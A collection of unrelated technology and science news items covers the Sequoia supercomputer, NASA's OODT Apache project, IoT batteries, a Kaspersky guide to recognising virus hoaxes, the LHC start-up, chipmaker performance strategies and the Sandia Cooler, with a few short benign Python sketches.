Related links: Health Canada - Nutrition Labelling; Health Canada - The Nutrition Facts Table; Healthy Canadians - The Percent Daily Value (%DV); Healthy Canadians - Healthy and Safe for Canadians Framework; Health Canada - Food Labels. Health Canada news releases are available on the Internet at: www.healthcanada.gc.ca/media
In case you missed it... According to Top 500, the United States can claim to have the world's fastest supercomputer for the first time in three years. IBM's Sequoia has taken the title of the world's fastest supercomputer. The system is based on IBM's BlueGene/Q server technology, and it packs 1,572,864 processor cores with 1.6 petabytes of memory. Physically speaking, the supercomputer takes up about 3,422 square feet of space spread out into 96 refrigerator-sized server racks. All this power lets Sequoia perform 16.32 quadrillion calculations per second (16.32 petaFLOPS). The previous record holder was Fujitsu's K supercomputer, which topped 10.51 petaFLOPS in November of last year. That computer ran on 705,000 processor cores and was housed at Japan's Riken Advanced Institute for Computational Science in Kobe. IBM built its Sequoia supercomputer for the Department of Energy's Lawrence Livermore National Laboratory. The National Nuclear Security Administration will use Sequoia to produce simulation tests and help maintain the country's aging stockpile of nuclear weapons without the need for underground nuclear explosive testing. That sounds impressive and all, but can it run Crysis? This story, "IBM builds the world's fastest supercomputer to help take care of our nukes" was originally published by PCWorld.
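A quick division of the figures quoted above shows where Sequoia's lead comes from: sheer core count rather than per-core speed. The sketch below uses only the numbers given in this article.

    # Per-core throughput comparison using only the figures quoted above.
    PFLOPS = 1e15

    sequoia_flops = 16.32 * PFLOPS
    sequoia_cores = 1_572_864

    k_computer_flops = 10.51 * PFLOPS
    k_computer_cores = 705_000

    sequoia_per_core = sequoia_flops / sequoia_cores      # roughly 10.4 GFLOPS per core
    k_per_core = k_computer_flops / k_computer_cores      # roughly 14.9 GFLOPS per core

    print(f"Sequoia:    {sequoia_per_core / 1e9:.1f} GFLOPS per core")
    print(f"K computer: {k_per_core / 1e9:.1f} GFLOPS per core")
    print(f"Sequoia's headline speedup: {sequoia_flops / k_computer_flops:.2f}x")

By this simple division, each K computer core actually delivers more FLOPS than a Sequoia core; Sequoia's record comes from running more than twice as many cores.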
NASA open-source project gains Apache's top-level status Agency's Object Oriented Data Technology is recognized as a Top-Level Project by the open-source flagship - By Dan Rowinski - Jan 05, 2011 An open-source project by NASA's Jet Propulsion Laboratory has gained the support of the Apache Software Foundation as a Top-Level Project. Object Oriented Data Technology (OODT) is a data-sharing architecture NASA developed to use metadata to seek out disparate and geographically dispersed data sources for access by any user. It was developed for that purpose in 1998 and has evolved in the past 12 years to accommodate data sharing among several NASA Earth science projects, including the NPOESS Preparatory Project, a joint effort by NASA, the Defense Department and the National Oceanic and Atmospheric Administration, and the Soil Moisture Active and Passive test bed. "Each database is broken into a different data type," said Chris Mattmann, a senior computer scientist at the Jet Propulsion Lab. "The system collects data with different technology and turns it into an online entry point that allows people to search across datasets." OODT's primary use is to allow scientists and academicians to conduct deep research in the databases without having to start from scratch for every search. Mattmann said the foundation and the lab have configured OODT to also allow users to add data to the sets. "One thing that we are currently focused on is a way to intuitively extract data, allow its use to target our users more effectively," Mattmann said. "We are also working toward improving the graphical user interfaces." One interesting use for OODT outside Earth science and planetary datasets is in the realm of health IT. The Jet Propulsion Lab received a grant from the National Institutes of Health to perform informatics and other data functions for Children's Hospital in Los Angeles. Specifically, the lab has been using OODT to support the hospital's Virtual Pediatric Intensive Care Unit. OODT acts as middleware code written primarily in Java. Its architecture can handle computer processing workflow, hardware and file management, information integration, and database links. It also has several Java and Python-based application programming interfaces that allow users to easily interact with the system, according to the Jet Propulsion Lab. Now that it has been recognized as a Top-Level Project by the Apache Software Foundation, OODT can receive project management and resource support from the foundation. After some research, NASA chose to make the code open source and enlisted the Apache Software Foundation's help in January 2010. That partnership opened up the code to a community of 3,500 open-source developers who are diligent in providing quality code. "We regularly used open-source software in our daily [lab] tasks and were impressed with the quality of code and vibrant nature of free and open-source software communities," Mattmann said in the Jet Propulsion Lab's announcement. The group's open-source community can help OODT become a more robust architecture and quicken the pace of development because more developers can work with the code at the same time. OODT is the first NASA-developed project to be awarded Top-Level Project designation by the Apache Software Foundation. Fewer than 100 software packages have that designation, making OODT part of a prestigious group.
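The snippet below is not Apache OODT code and does not use its actual API; it is only a conceptual sketch of the idea described above: data products registered with descriptive metadata so that users can search across holdings without caring where the underlying files live. All class names, fields, and sample records are invented for illustration.

    from dataclasses import dataclass, field

    @dataclass
    class DatasetRecord:
        """One catalogued product: where it lives plus descriptive metadata."""
        product_id: str
        location: str                       # URL, archive path, hospital system, etc.
        metadata: dict = field(default_factory=dict)

    class MetadataCatalog:
        """Toy stand-in for a metadata-driven catalog (not the real OODT API)."""
        def __init__(self):
            self._records = []

        def ingest(self, record: DatasetRecord):
            self._records.append(record)

        def query(self, **criteria):
            """Return records whose metadata matches every key/value given."""
            return [r for r in self._records
                    if all(r.metadata.get(k) == v for k, v in criteria.items())]

    catalog = MetadataCatalog()
    catalog.ingest(DatasetRecord("npp-001", "s3://mission/npp/granule1.h5",
                                 {"mission": "NPP", "instrument": "ATMS", "year": 2011}))
    catalog.ingest(DatasetRecord("smap-042", "https://archive/smap/042.nc",
                                 {"mission": "SMAP", "instrument": "radiometer", "year": 2011}))

    for rec in catalog.query(year=2011, mission="NPP"):
        print(rec.product_id, "->", rec.location)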
The Apache Software Foundation is the flagship open-source community and powers the Apache HTTP Server, which runs much of the technology behind the Web. Dan Rowinski is a staff reporter covering communications technologies.
Battery issues are the Achilles' heel of the IoT. Whether you are trying to manage remote sensors with a small battery, or you want to harness the power of the sun and store the energy in the smart grid, battery solutions represent the driver for your network architecture and your cost models. As usual with The Hot List, we have to talk about what is included and what is excluded. The theme of The IoT Battery Hot List is power storage, so power converters and uninterruptible power supplies are excluded. The result is that several brand names are not included in this specific discussion. Included are batteries using various chemistries, fuel cells, and power cells. This means that alternative energy is not specifically in this discussion, while traditional battery companies are included. In some ways talking about The Hot List with batteries is a bad idea. We all know about the Samsung Galaxy Note 7, whose lithium-ion battery could catch fire. While Samsung is the latest news, the problem with battery fires and general recycling was the catalyst for many start-ups and failures. Moving away from lithium was the vision for A123 Systems, which was a flagship for U.S. government and MIT technology. However, the advances and immediate buzz were short-lived. The delays with battery research turning into product sales resulted in a lot of acquisitions. The result was that the company that was to be a flagship crashed and was rescued by China's Wanxiang Group. Almost all the companies involved with battery research are now in privately held funds. A123 Systems is a leader in mixed-material Lithium Iron Phosphate (LFP) and Nickel Manganese Cobalt (NMC) chemistries; it is not a market leader. However, all the applications A123 Systems is focused on are IoT related. Warren Buffett, who already owns Duracell, put his battery investments into BYD, a Chinese company that focuses on the needs of the electric vehicle market. The research has yielded more opportunities and expanded storage into alternative markets. One of the largest markets for batteries these days is the emerging space of electric vehicles. Panasonic is Tesla's partner in battery development, and the new factory being built in Reno, Nev., is innovating on product size if not chemical materials. According to a Fortune article, Tesla looked at how to bring the cost of batteries down and decided that the conventional size (i.e., 18650) of lithium-ion batteries was too small. "For example, if you make a lithium-ion battery bigger, it could store more energy and produce more power. However, longer and wider batteries could mean that the battery pack (which collects individual battery cells together) could be wider or heavier, which could constrain the design or range of the car. But the Tesla team seems satisfied with settling on the 21-70 formats for its lithium-ion batteries for its Model 3 cars. In fact, Tesla fancies the 21-70 formats so much that it could even consider one day using those batteries for its older car models. Musk said that after Tesla gets the Model 3 out the door it will revisit whether or not it wants to make new Model X cars with the 21-70 batteries." Supporting the charging of electric cars makes distributed smart-grid solutions in smart cities critical. This means a change in the peak usage hours with the need to charge auto batteries and store energy. According to Tom Rebbeck of Analysys Mason, "More utilities will embrace energy transition fundamentals and adopt new operational and service models, supported by new technology.
Advances in technology have fundamentally changed the economics of providing energy and are disrupting the historical model for distribution through development of the distribution service operator or on-demand utility model. Cities represent 78 percent of global energy demand at present, placing the smart-city concept at the heart of the climate change agenda." This will translate into more energy storage by transmission substations and on-premises offerings by the utilities for large facilities. Rebbeck goes on to point out that "advances in technology have fundamentally changed the economics of providing energy and are disrupting the historical model for distribution through development of the distribution service operator or on-demand utility model." One company that recognizes its role in IoT is ABB, which acquired Power-One and has been integrating its battery solutions into the smart grid. ABB did a recent survey of utility companies, and it's clear that battery storage within the grid is going to increase significantly. Doosan Fuel Cell was established in 2014 when Doosan Corp. made two strategic moves in the fuel cell market – acquiring the assets of ClearEdge Power, a fuel cell technology leader in the United States, and merging with Fuel Cell Power, a residential fuel cell leader in Korea. Off-the-grid environments like remote monitoring solutions for oil and gas equally want to reduce the cost of transmission. Enabling remote devices to stay connected without truck rolls and hands-on maintenance is an essential element of widespread adoption of IoT. The result is that low-power wide-area alternatives like Sigfox and RPMA from Ingenu are being deployed. This represents the second new market and is one of the reasons new categories of antenna have been created for LTE deployments as well. Markku Rouvala from New Nordic Engineering shared that battery-powered, ultra-low-power electronics processes have created a new class of electronics devices. In this new world, tiny processors with smart electronics are the drivers instead of maximum processing power. "While low power sensor radio technologies are enabling sensor nodes to be connected within tens or hundreds of meters to each other, ultra-low power sensor technologies are enabling these nodes to run for years, even tens of years on the primary battery, i.e. without charging." Protocol selection also matters: sensor node battery life depends on the radio transmission distance. At the moment, IoT radio protocol standardization is experiencing such hype that it is almost impossible to predict the winner of it all, and it is necessary in many cases to support multiple protocols. For sensors with very small power requirements (say, 1 uA or below when active and around 100 nA when idle), even a small battery the size of a CR2032 coin cell can power the device for a very long time, five to 10 years or more. When more than 10 years of lifetime is required, the battery chemistry itself becomes more important, and special chemistries are needed to make the shelf life long enough. What is clear is that battery strategies are driving IoT solutions out into the field and on the road. (A rough battery-life estimate along these lines appears as a short code sketch at the end of this article.) Here is The Hot List. A123 Systems LLC develops and manufactures advanced Nanophosphate lithium iron phosphate batteries and energy storage systems that deliver high power, maximize usable energy, and provide long life, all with excellent safety performance.
A123 Systems is a TS-16949 and ISO9001 certified supplier of advanced lithium ion cells and systems designed to help customers quickly and cost effectively take engineering breakthroughs from conception to commercialization. ABB is a leader in power and automation technologies that enable utility, industry, and transport and infrastructure customers to improve their performance while lowering environmental impact. The ABB Group of companies operates in roughly 100 countries and employs about 135,000 people. BYD is the global leader and innovator in battery technology and one of the top three largest battery manufacturers in the world. It develops large-scale, grid-connected, energy storage systems, distributed energy storage systems, and micro-grid storage systems for commercial and home customers around the world. BYD’s unique battery chemistry makes it the safest choice for energy storage available on the market today. The BYD Iron-Phosphate battery passes every international standard for battery safety testing available – an accomplishment it says is unmatched in the industry. C&D Technologies Inc. produces and markets systems for the power conversion and storage of electrical power, including industrial batteries and electronics. This specialized focus has established the company as a leading and valued supplier of products in reserve power systems and electronic power supplies. Cummins Power Generation Business is a global provider of power generation systems, components, and services in standby power, distributed power generation, as well as auxiliary power in mobile applications to meet the needs of a diversified customer base. Cummins Power Generation also provides a full range of services and solutions, including long-term operation and maintenance contracts and turnkey and temporary power solutions. Doosan manufactures and markets high-performance fuel cell solutions that provide combined cooling, heat, and power. In the United States it provides cost competitive, clean, reliable energy solutions for customers that need secure uninterrupted power, even during blackouts, for their commercial buildings, industrial plants, data centers, hospitals, and universities. In Korea it produces compact fuel cells for residential use, while strengthening its position in the large power generation sector, in line with government policy on renewable energy provisions. Started in the 1920s, the Duracell brand and company was recently acquired by Berkshire Hathaway Inc. and has grown to be the leader in the single-use battery market in North America. The iconic Duracell brand is known the world over. Its products serve as the heart of devices that keep people connected, protect their families, entertain them, and simplify their increasingly mobile lifestyles. It also offers recharging technology. Berkshire Hathaway is a $210 billion holding company owning subsidiaries that engage in diverse business activities. EaglePicher Technologies is an industry leader in integrated power solutions. Demands on technology call for batteries and devices that are both smaller and lighter, yet deliver more energy while increasing safety. EaglePicher meets these needs. EnerDel designs, builds, and manufactures lithium-ion energy storage solutions and battery systems with a focus on heavy duty transportation, on- and off-grid electrical, mass transit and task-oriented applications. 
EnerDel's product suite delivers energy-dense solutions for both high-power and high-energy applications, including one of the most energy-dense cells in the industry. The company says it uses superior materials for added safety and better performance. EnerSys is the global leader in stored energy solutions for industrial applications. It manufactures and distributes reserve power and motive power batteries, battery chargers, power equipment, battery accessories, and outdoor equipment enclosure solutions that are used worldwide. It also manufactures and sells related direct current power products including chargers, electronic power equipment, and a wide variety of battery accessories. Energizer offers a full range of long-lasting miniature batteries for use in watches, cameras, glucose monitors, pedometers, remote controls, and other small devices. Exide Technologies is a global provider of stored electrical energy solutions – batteries and associated equipment and services for transportation and industrial markets. The Exide Transportation business manufactures and markets starting, deep-cycle, and micro-hybrid batteries for automotive, light and heavy-duty truck, agricultural, marine, military, powersport, and other specialty applications. The power of Panasonic Industrial Devices brings strategic innovations to customers' product development processes. Many products sold by Fortune 500 companies are powered by Panasonic technology. Valence Technology Inc. is a privately held corporation organized under the laws of the State of Delaware in the U.S. Founded in 1989, Valence Technology developed the industry's first commercially available, safe, large-format family of lithium iron magnesium phosphate rechargeable batteries. Edited by Ken Briodagh
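As promised above, here is the kind of back-of-the-envelope arithmetic behind the "five to 10 years on a CR2032" claim. The capacity, usable fraction, and self-discharge figures are assumptions chosen only for illustration; real lifetimes depend heavily on temperature, pulse currents, and cell chemistry.

    # Back-of-the-envelope sensor battery-life estimate.
    # All figures are illustrative assumptions, not vendor specifications.
    CR2032_CAPACITY_MAH = 220.0            # typical coin-cell rating (assumed)
    HOURS_PER_YEAR = 24 * 365

    def battery_life_years(avg_current_ua, capacity_mah=CR2032_CAPACITY_MAH,
                           usable_fraction=0.8, self_discharge_per_year=0.01):
        """Very rough lifetime estimate ignoring temperature and pulse effects."""
        usable_mah = capacity_mah * usable_fraction
        avg_current_ma = avg_current_ua / 1000.0
        # Spread an assumed 1%-per-year self-discharge over the year as extra load.
        self_discharge_ma = capacity_mah * self_discharge_per_year / HOURS_PER_YEAR
        return usable_mah / ((avg_current_ma + self_discharge_ma) * HOURS_PER_YEAR)

    # A node that sleeps near 100 nA and averages roughly 1 uA while duty-cycling:
    for avg_ua in (0.1, 1.0, 2.0):
        print(f"average {avg_ua:.1f} uA -> ~{battery_life_years(avg_ua):.1f} years")

Note how, at very low average currents, the assumed self-discharge term starts to dominate, which is exactly why the article says that lifetimes beyond 10 years push the choice toward special chemistries with long shelf lives.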
A study-guide on how to detect a virus hoax yourself It is difficult to imagine anybody today who does not treat computer viruses as a real threat to a regularly functioning computer system. However, contiguously with the virus spreading has occurred another syndrome, which is not any less dangerous - virus hoaxes. The idea of a virus hoax is simple: an offender fabricates a warning about an extremely dangerous virus that actually does not exist at all. After that, he sends the hoax to as many users as possible, asking them to take appropriate measures and to forward the message to others. Scared users, doing their best, inform all their colleagues and partners. As a result, the computer world is constantly agitated by bursts of virus hysteria, alarming tens of thousands of people all around the world. The "heyday" of the virus hoax was 1997-1998 when nearly every month, anti-virus companies were struck by a huge wave of e-mail from frightened users. As a result, these same anti-virus companies had to release soothing "calm down" articles. How can you recognize a real virus warning from a hoax? And what do you do should your friends believe this bad joke? The main rule: If the message did not come directly from an anti-virus-developer news service, then you should check the hoax sections at specialised Internet resources. We recommend you subscribe to the Kaspersky Lab Virus Encyclopaedia or check Rob Rosenberger's popular Virus Myths & Hoaxes Web site at VMyths.com. In case you don't find the virus alert you have received on these pages, then you should visit the news section on Kaspersky Lab Web site. Our experts are very fast in delivering breaking news about the latest virus outbreaks. Should there be any new outbreaks, you will find a corresponding notification at www.viruslist.com. In the event that you fail to locate any details regarding the virus mentioned in the alert, you should send a request to Kaspersky Lab technical support (email@example.com) for clarification. What should you do if you have received a real virus hoax? Firstly, do not forward it to anyone else. The best way of handling such messages is to delete them immediately. Secondly, as fast as you can, notify the sender that he has fallen victim to a virus hoax. There is still a possibility he hasn't managed to send the "virus alert" to others, so by informing him of his error, you are helping him save his credibility for not crying "wolf," causing friends and colleagues unnecessary nerve-wracking moments. In addition, it also needs to be mentioned that virus hoaxes carry an even more dangerous payload than simply scaring people with hollow alerts. It is possible that at sometime, a malefactor will write a virus, utilizing the nickname of a well-known virus hoax, thus, users-believing it is fine to do so-will open the attached file and get infected. At this time, we would like to remind you of the Golden Rule in regards to computer hygiene: Do not, under any circumstances, open any attached files received from unknown sources. You should be careful even with messages received from the people you know: many viruses send out infected files from affected computers in a way a user simply doesn't realize. Thus, if you consider the message to be unexpected and strange (for instance, a love letter from your boss), then it is better to check whether the sender has really sent the file, and to be sure his computer is not infected. 
"Perhaps, some will consider it strange, but some paranoia is an essential part of computer security, especially when dealing with e-mail," said Den Zenkin, Head of Corporate Communications for Kaspersky Lab.
Scientists Start Biggest Physics ExperimentBy Reuters - | Posted 2008-09-10 Email Print Experiments using the Large Hadron Collider (LHC), the biggest and most complex machine ever made, could revamp modern physics and unlock secrets about the universe and its origins. The project has had to work hard to deny suggestions by some critics that the experiment could create tiny black holes of intense gravity that could suck in the whole planet. GENEVA (Reuters) - International scientists celebrated the successful start of a huge particle-smashing machine on Wednesday aiming to recreate the conditions of the "Big Bang" that created the universe. Experiments using the Large Hadron Collider (LHC), the biggest and most complex machine ever made, could revamp modern physics and unlock secrets about the universe and its origins. The project has had to work hard to deny suggestions by some critics that the experiment could create tiny black holes of intense gravity that could suck in the whole planet. Such fears, fanned by doomsday writers, have spurred huge interest in particle physics before the machine's start-up. Leading scientists have dismissed such concerns as "nonsense." The debut of the machine that cost 10 billion Swiss francs ($9 billion) registered as a blip on a control room screen at CERN, the European Organization for Nuclear Research, at about 9:30 a.m. (3:30 a.m. EDT). "We've got a beam on the LHC," project leader Lyn Evans told his colleagues, who burst into applause at the news. The physicists and technicians huddled in the control room cheered loudly again an hour later when the particle beam completed a clockwise trajectory of the accelerator, successfully completing the machine's first major task. Eventually, the scientists want to send beams in both directions to create tiny collisions at nearly the speed of light, an attempt to recreate on a miniature scale the heat and energy of the Big Bang, a concept of the origin of the universe that dominates scientific thinking. The Big Bang is thought to have occurred 15 billion years ago when an unimaginably dense and hot object the size of a small coin exploded in a void, spewing out matter that expanded rapidly to create stars, planets and eventually life on Earth. Problems with the LHC's magnets caused its temperature -- which is kept at minus 271.3 degrees Celsius (minus 456.3 degrees Fahrenheit) -- to fluctuate slightly, delaying efforts to send a particle beam in the counter-clockwise direction. The beam started its progression and then was halted. "This is a hiccup, not a major thing," Rudiger Schmidt, CERN's head of hardware commissioning, told reporters, adding the second rotation should be completed on Wednesday afternoon. Evans, who wore jeans and running shoes to the start-up, declined to say when those high-energy clashes would begin. "I don't know how long it will take," he said. "I think what has happened this morning bodes very well that it will go quickly ... This is a machine of enormous complexity. Things can go wrong at any time. But this morning we had a great start." Once the particle-smashing experiment gets to full speed, data measuring the location of particles to a few millionths of a meter, and the passage of time to billionths of a second, will show how the particles come together, fly apart, or dissolve. 
It is in these conditions that scientists hope to find fairly quickly a theoretical particle known as the Higgs Boson, named after Scottish scientist Peter Higgs who first proposed it in 1964, as the answer to the mystery of how matter gains mass. Without mass, the stars and planets in the universe could never have taken shape in the eons after the Big Bang, and life could never have begun -- on Earth or, if it exists as many cosmologists believe, on other worlds either. © Thomson Reuters 2008 All rights reserved
There's no two ways around it: The PC is slowing down with age. That may be a bit harsh--computers are faster and smaller than ever before--but processor performance simply isn't advancing at its past breakneck pace. At one time, 50 to 60 percent leaps in year-to-year performance were commonplace. Now, 10 to 15 percent improvements are the norm. Luckily, five-plus-year-old computers can still tackle everyday tasks just fine, so the performance slowdown isn't a huge issue. Plus, it's nice not having to replace your PC every other year during a down economy. But technology doesn't advance by sticking to the status quo. The future needs speed! Fortunately, the biggest names in PC processors aren't satisfied with the status quo. Chip makers are working furiously to solve the problems posed by a slowing Moore's Law and the rise of the power wall, in a bid to keep the performance pedal to the metal. So what kinds of radical tricks do they have up their sleeves? Several different kinds, actually--and each holds great potential for the future. Let's take a look behind the curtain. Intel: Building on the shoulders of giants Can we chalk up today's paltry performance gains to a breakdown in Moore's Law? Not quite. Moore's legendary line might be frequently misquoted to talk about CPU performance, but the letter of the Law revolves around the number of transistors on a circuit doubling every two years. While other chip makers have struggled to shrink transistors and squeeze more of them onto a chip, Intel--the company Moore himself cofounded--has kept pace with Moore's Law since its utterance, an achievement that can be laid at the feet of Intel's small army of engineers. Not just any engineers, though. Clever engineers. As transistors become more tightly packed, heat and power-efficiency concerns become major problems. Now that transistors are reaching almost infinitesimally small sizes--each of the billion-plus transistors in Intel's Ivy Bridge chips measure 22 nanometers (nm), or roughly 0.000000866 inch--conquering those woes takes creative thinking. "There's no doubt it's getting hard," Intel technical manufacturing manager Chuck Mulloy said in a phone interview. "Really, really hard. I mean, we're at the atomic level." To keep progress a-rollin', Intel has made some significant changes to the base design of transistors over the past decade. In 2002, the company announced that it was switching to so-called "strained silicon," which increased chip performance by 10 to 20 percent by slightly deforming the structure of silicon crystals. Mo' power means mo' problems, though. Specifically, as transistors continue to shrink, they suffer from increased electron "leakage," which makes them far less efficient. Two recent tweaks combat that leakage in novel ways. Without getting too geeky, the company started by swapping out the transistors' standard silicon dioxide insulators in favor of more efficient "high-k metal-gate" insulators during its shift to the 45nm manufacturing process. It sounds simple, but it was actually a big deal. That was followed by an even more monumental change, with the introduction of "tri-gate" or "3D" transistor technology in Intel's current Ivy Bridge chips. Traditional "planar" transistors have a pair of "gates" on either side of the channels that carry electrons. Tri-gate transistors shattered that two-dimensional thinking with the addition of a third gate over the channel, connecting the two side gates. 
The design improves efficiency by reducing leakage while lowering power needs. Again, it sounds simple, but manufacturing three-dimensional transistors requires immense technical precision. At the moment, Intel is the only chip maker shipping processors with 3D transistors. So what's next for Intel? The company isn't telling. In fact, Mulloy says that any technology the company might use--like, say, the next-gen extreme ultraviolet lithography fabrication process--goes into a PR "black hole" years before Intel introduces it in its chips. But, he stressed, the past improvements discussed above don't just stop when they're introduced to the public. "People tend to think 'Intel used this, now they're on to the next thing,'" Mulloy said. "Strained silicon did not go away when we added the capabilities of high-k metal gate. High-k metal gate didn't go away when we went to tri-gate transistors--we're still building and improving on that. We're at the fourth generation of strained silicon, the third generation of high-k metal gate, and our upcoming 14nm chips will be the second generation of tri-gate." The best chip technology out there just keeps getting better, in other words. Oh, and for what it's worth, Intel thinks Moore's Law will continue unabated for at least two more transistor-shrink generations. AMD: Parallel computing all the way Intel isn't the only chip maker in town, though. Rather than betting purely on improvements to transistor technology, rival AMD thinks the future of performance hinges on cutting CPUs some slack by shifting some of the workload to other processors that might be better suited for particular tasks. Graphics processors, for example, smoke through tasks that require a multitude of simultaneous calculations, such as password cracking, Bitcoin mining, and many scientific uses. Ever heard of parallel computing? That's what we're talking about. "Going into smaller nodes on the transistor side increases [CPU] performance by 6 to 8 to maybe 10 percent, year to year," says Sasa Marinkovic, a senior technology marketing manager at AMD. "But adding a GPU with GPU compute capabilities gives much larger gains. For example, for Internet Explorer 8 to IE9 the performance increase was 400 percent--four times the performance of the previous generation, and it's all thanks to [IE9's] GPU acceleration." "We see that type of performance leap playing within today's power envelope, or you can greatly lower the power envelope and see the same performance [you have today]," Marinkovic says. AMD has been inching toward a heterogeneous system architecture--as the method of distributing the workload amongst several processors on a single chip is called--in its popular accelerated processing units, or APUs, including the one powering the upcoming PlayStation 4 gaming console. APUs contain traditional CPU cores and a large Radeon graphics core on the same die. The CPU and GPU in AMD's next-gen Kaveri APUs will share the same pool of memory, blurring the lines even further and offering even faster performance. AMD isn't the only chip maker backing the idea of parallel computing. The company was a founding member of the HSA Foundation, a consortium of top chip makers--albeit sans Intel and Nvidia--that are working together to create standards that should hopefully make programming for parallel computing easier in the future.
It's a good thing that industry-leading companies provide the backbone of the HSA Foundation's vision, because in order for the grand heterogeneous future of parallel computing to come to fruition, programs and applications need to be specifically written to take advantage of the hardware designs. "Software is the key," Marinkovic admits. "When you look at APUs with [full HSA compatibility] and without full HSA, the software will have to change. But it will be a change for the better...Where we want to get to is code-once, and use everywhere. Once you have the HSA architecture across all these different HSA Foundation companies, hopefully you'll be able to write a program for a PC and run it on your smartphone or tablet with some small tweaks or compilation." You can already find application processing interfaces (APIs) that enable parallel GPU computing, such as Nvidia's GeForce-centricA CUDA platform, the DirectCompute API baked into DirectX 11 on Windows system, and OpenCL, an open-source solution managed by the Khronos Group. Support for hardware acceleration is picking up among software developers, though most of the programs handle intensive graphics in some way. Internet Explorer and Flash are on the bandwagon, for instance. Just last week, Adobe announced it was adding OpenCL support for the Windows version of Premiere Pro. According to representatives, users with AMD discrete graphics card or APUs will be able to tap into that GPU acceleration to edit HD and 4K videos in real time, or export videos up to 4.3 times faster than the base nonaccelerated software. "I don't think there's any ifs or buts about this," Marinkovic says. "Heterogeneous architectures are the way of the future." OPEL: So long, silicon, hello, gallium arsenide! But is that future based on silicon technology, as today's computing is? Definitely, for the short term. Definitely not, in the long term. Sometime in the future--experts don't know exactly when--silicon will reach its limits and simply won't be able to be pushed any further. Chip makers will have to switch to another material. That day is a long way off, but researchers are already exploring alternatives. Graphene processors receive a lot of hype as a potential silicon successor, but OPEL Technologies thinks the future lies in gallium arsenide. OPEL has been fine-tuning the gallium arsenide technology at the heart of its POET (Planar Opto Electronic Technology) platform for more than 20 years, and the company has worked with BAE and the U.S. Department of Defense (among others) to validate it. While past processor forays into gallium arsenide have ended in mild disappointment, OPEL representatives say their proprietary technology is ready for the big time. OPEL only recently exited the R&D stage and hasn't tried to make itty-bitty transistors at Ivy Bridge's 20nm size, but the company claims that at 800nm, gallium arsenide processors are faster than today's silicon and use roughly half as much voltage. "If you wanted to match the speed of today's silicon processors, at roughly a 3GHz clock rate, you wouldn't have to go all the way down to 20 or 30 nanometers," says OPEL chief scientist Dr. Geoffrey Taylor. "Heck, you could probably hit that at 200nm." And that's using planar technology, not 3D transistors. One of the biggest problems any silicon alternative faces is that silicon is the most cutting-edge technology in the world, with billions invested in manufacturing silicon processors to maximum efficiency. 
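The "write one data-parallel kernel, then let whatever processor is available chew through it" idea can be illustrated without any GPU at all. The Python sketch below uses a process pool as a stand-in for an accelerator; it is a conceptual illustration only, not HSA, OpenCL, DirectCompute, or CUDA code.

    from multiprocessing import Pool
    import math

    def work_item(x):
        """One independent element of a data-parallel job (e.g., one pixel or sample)."""
        return math.sqrt(x) * math.sin(x)

    def run_serial(data):
        return [work_item(x) for x in data]

    def run_parallel(data, workers=4):
        # The same per-element kernel, farmed out to many workers at once --
        # conceptually what GPU-compute APIs do with thousands of hardware threads.
        with Pool(workers) as pool:
            return pool.map(work_item, data)

    if __name__ == "__main__":
        data = list(range(200_000))
        serial = run_serial(data)
        parallel = run_parallel(data)
        print("results match:", serial == parallel)

On a real heterogeneous system the same per-element kernel would be compiled for the GPU and launched across thousands of threads, which is where the large speedups quoted above come from.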
It's going to be hard to convince Intel, AMD, ARM, and the HSA Foundation to drop all that for a new material. OPEL says its technology has a large overlap with current silicon fabrication methods. "It's scalable, and it's bolt-on to CMOS," says executive director Peter Copetti. "That's very important. In our discussions with different foundries and semiconductor companies, the first thing they ask is 'Do I have to retool my facilities?' The investment here is minimal because our system is complementary to what's out there right now." OPEL also says its wafers are reusable. The International Technology Roadmap for Semiconductors has identified gallium arsenide as a potential silicon replacement sometime between 2018 and 2026. There is still a ton of testing and transitioning to be done before gallium arsenide captures anyA of the mainstream PC processor market, but if even a fraction of OPEL's claims hold true, its technology could very well power the processors of the future. Striding toward a face-melting tomorrow So, after all that--whew!--you have a better idea of where the future of PC performance is headed. The initiatives from Intel, AMD, and OPEL each tackle big problems in decidedly different ways, but that's a good thing. You don't want all of your potential eggs in a single basket, after all. And best of all, if all those disparate pieces of the PC performance puzzle prove successful, they could theoretically merge in Voltron-like fashion to create an uber-powerful, GPU-assisted, tri-gate gallium arsenide processor that could blow the pants off even the beefiest of today's Core i7 processors. Today's performance curve may be flattening out, but the future has never looked so beastly. This story, "How Chipmakers are Breaking Moore's Law and Pushing PCs to Blistering New Levels" was originally published by PCWorld.
GCN LAB IMPRESSIONS Heat sink revolution: Sandia Cooler smaller, quieter, 30X more efficient - By Greg Crowe - Jul 11, 2012 We all know that the main enemy of computer components' lifespan and performance is heat. Keeping heat out of the parts that make the computer work -- in particular the processor -- and sending it away has always been a challenge. It would be easy if you had the resources to sink your systems into stuff like liquid nitrogen, of course, but how many of us do? If you aren't a Bond villain, the odds of that are pretty low. But Sandia National Laboratories may have come up with an answer: a new type of air-cooled heat exchanger for processors and other chips that normal folks and government agencies can use. The typical approach to cooling a computer is to have a heat sink made up of metal foils in physical contact with the chip, and a circular fan positioned to draw the hot air away from the heat sink. Unfortunately, this can create pockets of dead air among the foils, which of course just keep getting hotter. Researchers at Sandia have managed to combine the heat sink and fan into one with a rotating fin structure. Dubbed the Sandia Cooler, it looks like a set of curved heat sink foils that spiral out from the center in a clockwise pattern. When the array is spun counterclockwise, a mini vortex is created in the middle that draws air down into the structure and pushes it out along the curved channels between the foils. This, of course, cools the foils and keeps any air from forming pockets. Sandia said the cooler is 10 times smaller than current CPU coolers and 30 times more efficient. And it's more energy-efficient and significantly quieter to boot. More details about the project can be found in Sandia's presentation and accompanying video.
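To see why a better heat exchanger matters, the sketch below runs the basic steady-state relation (die temperature is roughly ambient temperature plus dissipated power times the thermal resistance of the cooling path) over a few assumed resistance values. None of these figures are Sandia's; they are illustrative placeholders.

    # Simple steady-state heat-sink arithmetic: die temperature rises by
    # (power dissipated) x (thermal resistance of the cooling path).
    # The wattage and resistance values below are illustrative assumptions only.
    ambient_c = 25.0
    cpu_power_w = 95.0                       # a typical desktop CPU power budget (assumed)

    coolers = {
        "modest stock cooler (0.50 C/W)": 0.50,
        "good tower cooler (0.25 C/W)": 0.25,
        "much better exchanger (0.10 C/W)": 0.10,
    }

    for name, r_theta in coolers.items():
        die_temp = ambient_c + cpu_power_w * r_theta
        print(f"{name}: die around {die_temp:.0f} C")

Cutting the thermal resistance of the exchanger directly cuts how hot the chip runs for the same workload, or lets the same temperature budget support a faster, hotter chip.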
